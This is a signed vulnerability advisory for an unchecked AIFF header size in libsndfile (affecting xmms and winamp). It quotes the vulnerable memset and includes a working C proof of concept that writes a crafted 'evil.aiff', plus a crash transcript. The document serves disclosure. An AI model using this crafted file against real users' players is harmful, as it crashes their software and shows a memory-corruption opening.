-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
libsndfile AIFF buffer unverified
A security issue affects the following library/software releases
libsndfile <= 1.0.17
xmms-sndfile <= 1.2_4
winamp <= 5.541
And possibly more
- -BACKGROUND
Libsndfile is a C library for reading and writing files containing sampled
sound (such as MS Windows WAV and the Apple/SGI AIFF format) through one
standard library interface.
- -DESCRIPTION
Testing and debugging winamp, I have verified that the bug is specific to
the library libsndfile. I saw that some of the functions of reading gives
AIFF file headers, this does not check the limits of (CommonChunk.ckSize).
There may be other functions with the same problem. One of the errors
occur when unverified memset is called the limit of memory.
Quote segment code at src/aiff.c: 847
============================================================
else if (comm_fmt->size >= SIZEOF_AIFC_COMM)
{
//Some lines omitted
memset (psf-> u.scbuf, 0, comm_fmt-> size);
============================================================
- -CODE
============================================================
#include<stdio.h>
#include<stdlib.h>
#define AIFFSIZE 81
char *aiffbuff =
"\x46\x4f\x52\x4d\x00\x04\xcd\xec\x41\x49\x46\x46\x43\x4f\x4d\x4d\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x20\x5e\x01\x18\x0f\x3c\x0e\xe4"
"\x00";
int main(void) {
FILE *aiff = fopen("evil.aiff","w+");
fwrite(aiffbuff,AIFFSIZE,1,aiff);
fclose(aiff);
}
============================================================
At the time that these applications process the file with invalid headers,
stop for an unexpected error, tcsh sample:
============================================================
Anon@localhost % xmms -v
xmms 1.2.11
Anon@localhost % xmms -p evil.aiff
Segmentation fault
You've probably found a bug in XMMS, please visit
http://bugs.xmms.org and fill out a bug report.
============================================================
- -IMPACT
Just a fun, but without using Denial of Service to any programs
that run the library.
Att.
Anon[at]elhacker.net
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (FreeBSD)
iQCVAwUBSZbcxT0RloP1tHX9AQIfTQP/aqqzwsVwQow4U4D1lzM0CYIVymjYmL7+
k1qmq4cypYyaSCYUt9KXBIh52hWYFtFfMlrYnREgbf+zDIgme6syUkU7EfE567ah
1tXhjJdYlC3CrKc6t2psUqyuhHBDU8YVyLyuTvTvWykQjVRKJUlfvNEeB97CVvHe
rrl8KwnEItk=
=FNmo
-----END PGP SIGNATURE-----
Comentarios